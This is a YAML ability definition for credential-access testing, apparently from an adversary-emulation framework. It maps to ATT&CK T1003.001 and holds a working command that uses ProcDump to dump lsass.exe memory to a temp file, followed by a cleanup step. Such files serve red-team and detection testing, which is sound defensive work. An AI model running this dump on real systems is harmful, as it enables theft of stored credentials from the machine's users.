- delete_payload: true
  description: 'The memory of lsass.exe is often dumped for offline credential theft
    attacks. This can be achieved with Sysinternals

    ProcDump.


    Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.


    If you see a message saying "procdump.exe is not recognized as an internal or
    external command", try using the  get-prereq_commands to download and install
    the ProcDump tool first.

    '
  technique_name: 'OS Credential Dumping: LSASS Memory'
  repeatable: false
  buckets:
  - credential-access
  privilege: ''
  access: {}
  additional_info: {}
  technique_id: T1003.001
  plugin: ''
  singleton: false
  name: Dump lsass.exe via Procdump.exe
  executors:
  - platform: windows
    cleanup:
    - del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul
    parsers: []
    command: procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp
    language: null
    uploads: []
    variations: []
    timeout: 60
    additional_info: {}
    code: null
    name: cmd
    build_target: null
    payloads:
    - procdump.exe
  requirements: []
  tactic: credential-access
  id: 8538bc52-e950-46cb-9122-6a93eeb3d207
